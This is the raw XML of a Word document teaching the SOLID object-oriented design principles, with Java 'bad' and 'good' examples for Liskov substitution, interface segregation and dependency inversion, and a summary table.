    <w:p w14:paraId="506E6DC8"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fly</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37768246"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thro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UnsupportedOperationException</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Ostrich can't fly"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5870917E"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718A7559"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C4CAB8" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fix:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use better hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A1EA8F"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfac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Bird</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75B03122"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfac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FlyingBird</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extend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Bird</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0359E69B"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fly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF08886"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B249B4" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="5DAEACF3">
          <v:rect id="_x0000_i1399" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC2741B" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I – Interface Segregation Principle (ISP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ECF0FF" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Clients should not be forced to depend on methods they do not use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE64187" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C982E"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfac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Worker</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79170921"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work</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C630E7"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eat</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654EAF69"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AC3068"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Robo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mplement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Worker</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66C9B06A"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work</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6281B9E8"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ea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unnecessary for robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C5EC99"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351271F7" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Good:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAAD60B"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfac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Workabl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work</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77E21825"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfac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Eatabl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ea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37C52D77"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226E08F9"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Robo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mplement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Workabl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725AEAA8"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work</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24E923B2"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17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B3676" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="112DC4D7">
          <v:rect id="_x0000_i1400" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74611483" w14:textId="77777777" w:rsidR="000F4A91" w:rsidRPr="00CE4B95" w:rsidRDefault="000F4A91" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C351BB2" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>D – Dependency Inversion Principle (DIP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C74326F" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>High-level modules should not depend on low-level modules. Both should depend on abstractions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BFC40F" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D1577B"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MySQLDatabas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5515CFF7"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connec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40D81F1B"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2E299F"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App</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0BFF984C"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lastRenderedPageBreak/>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MySQLDatabase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> db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MySQLDatabase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678265C9"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1087C97B" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Good:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44493805"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfac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Databas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47F6E478"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connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A7A276"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B108505"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC1031"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MySQLDatabas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mplement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Databas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76961FE8"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connec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78530E13"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254FE66A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05473F90"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App</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195E1CA1"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Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> db</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7D117F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B151A24"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App</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Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> db</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3398AB39"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thi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db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db</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED82E0"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6CC284B1" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6978C7" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="23E5286D">
          <v:rect id="_x0000_i1401" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B7296" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">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4"/>
        <w:gridCol w:w="4562"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w14:paraId="69FEC7DE" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3377CDEB" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Principle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="162379A7" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w14:paraId="38D9F250" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E46856F" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2279E1D8" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>One class = One job</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w14:paraId="1A453609" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C31AE8C" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3901EF47" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Add features by extending, not modifying</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w14:paraId="7B3926EE" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C36B66F" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A019EE3" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Derived classes should work like the base</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w14:paraId="631D7161" w14:textId="77777777" w:rsidTr="00892A7B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A9768B4" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D989F1F" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5" w:rsidP="00892A7B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Split large interfaces into smaller ones</w:t>
            </w:r>
          </w:p>
